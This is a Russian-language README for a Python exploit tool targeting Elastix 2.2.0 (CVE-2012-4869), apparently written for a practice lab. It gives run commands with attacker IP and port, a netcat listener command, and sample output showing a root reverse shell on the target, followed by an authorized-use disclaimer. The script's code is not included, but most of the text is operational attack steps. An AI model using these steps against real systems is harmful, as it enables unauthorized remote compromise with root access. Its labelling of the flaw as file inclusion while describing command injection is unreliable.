
Python-скрипт эксплойта для уязвимости LFI Elastix 2.2.0 (CVE-2012-4869), позволяющий удаленное выполнение кода через внедрение Perl reverse shell нагрузки.
Этот скрипт эксплуатирует уязвимость локального включения файлов (LFI) в Elastix 2.2.0, позволяя выполнить удалённый код (RCE) путём внедрения команд через конечную точку callme_page.php. Эксплойт основан на CVE-2012-4869.
requestsУстановите зависимости с помощью:
pip install requests
python exploit.py <URL> --LHOST <YOUR_IP> --LPORT <YOUR_PORT>
python exploit.py "https://10.129.229.183" --LHOST "10.10.14.23" --LPORT 9001
Перед запуском эксплойта запустите прослушиватель Netcat на вашей машине:
nc -lvnp 9001
[*] Running Elastix 2.2.0 LFI Exploit - CVE-2012-4869
[*] Target: https://10.129.229.183
[*] Listening on 10.10.14.23:9001
[+] Exploit sent successfully, waiting for reverse shell...
[+] Connection from 10.129.229.183:41242
$ id
uid=0(root) gid=0(root) groups=0(root)
Этот эксплойт предназначен только для образовательного и авторизованного тестирования безопасности. Несанкционированное использование незаконно. Автор не несёт ответственности за неправильное использование этого инструмента.